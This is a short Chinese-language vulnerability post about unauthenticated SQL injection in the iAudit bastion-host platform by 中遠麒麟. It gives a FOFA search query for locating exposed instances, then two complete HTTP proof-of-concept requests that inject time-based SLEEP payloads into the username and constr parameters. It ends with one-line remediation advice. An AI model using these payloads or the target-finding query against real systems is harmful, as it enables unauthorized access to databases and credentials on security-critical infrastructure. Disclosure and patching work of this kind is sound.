0x01 產品簡介

? ? ? 中遠麒麟依托自身強大的研發能力,豐富的行業經驗，自主研發了新一代軟硬件一體化統一安全運維平臺一-iAudit 統一安全運維平臺。該產品支持對企業運維人員在運維過程中進行統一身份認證、統一授權、統一審計、統一監控，消除了傳統運維過程中的盲區，實現了運維簡單化、操作可控化、過程可視化，是企業 IT 內控最有效的管理平臺。

0x02 漏洞概述

? ??中遠麒麟堡壘機/baoleiji/api/tokens和admin.php接口處存在sql注入漏洞，未經身份認證的攻擊者可通過該漏洞獲取數據庫敏感信息及憑證，最終可能導致服務器失陷。

0x03 復現環境

FOFA：cert.subject="Baolei"

0x04 漏洞復現?

PoC-1

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

延時5秒

?PoC-2

https://your-ip/baoleiji/api/tokens

出現這種情況則可能存在漏洞?

POST /baoleiji/api/tokens HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1

?延時10秒

0x05 修復建議?

限制訪問來源地址，如非必要，不要將系統開放在互聯網上。

升級至安全版本或打補丁。